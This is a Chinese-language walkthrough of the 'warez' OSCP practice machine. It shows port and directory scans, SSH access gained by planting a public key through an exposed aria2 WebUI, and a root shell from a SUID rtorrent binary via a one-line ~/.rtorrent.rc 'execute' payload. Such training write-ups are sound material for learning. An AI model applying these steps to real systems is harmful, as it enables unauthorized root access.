OSCP 靶场
靶场介绍
warez |
easy |
webui-aria2、webui-aria2写入公钥、rtorrent提权 |
信息收集
主机发现
端口扫描
└─# nmap -sV -A -p- -T4 192.168.1.55
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-21 03:57 EST
Nmap scan report for 192.168.1.55
Host is up (0.00096s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 cc:00:63:dd:49:fb:1c:c7:ac:69:63:bc:05:1a:59:cd (RSA)
| 256 9b:19:49:25:eb:9c:60:c5:2b:ec:2a:d4:fd:d1:c2:f4 (ECDSA)
|_ 256 41:16:e6:d0:a0:da:22:4f:07:3f:c8:cf:60:2c:02:79 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Aria2 WebUI
|_http-server-header: nginx/1.18.0
6800/tcp open http aria2 downloader JSON-RPC
|_http-title: Site doesn't have a title.
MAC Address: 08:00:27:80:5D:88 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.96 ms 192.168.1.55
目录扫描
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://192.168.1.55 -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.55
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.55/index.html (Status: 200) [Size: 81758]
http://192.168.1.55/flags (Status: 301) [Size: 169] [--> http://192.168.1.55/flags/]
http://192.168.1.55/robots.txt (Status: 200) [Size: 12]
http://192.168.1.55/result.txt (Status: 200) [Size: 1585]
权限获取
aria2 webui 这里我们可以看到访问设置为carolina 账号的家目录
我们尝试将公钥上传到carolina 账号里面
上传公钥成功,使用ssh 连接成功获取权限。
ssh [email protected]
权限提升
使用如下命令查看suid 二进制文件,发现 rtorrent 存在可利用的可能,尝试对其进行利用。
carolina@warez:/tmp$ echo "execute = /bin/sh,-p,-c,"/bin/sh -p <$(tty) >$(tty) 2>$(tty)"" >~/.rtorrent.rc
carolina@warez:/tmp$ rtorrent
# id
uid=1000(carolina) gid=1000(carolina) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(carolina)
# whoami
root
# cd /root
# ls
root.txt
# cat root.txt
HMVKeepsharing
#
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【OSCP】warez
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论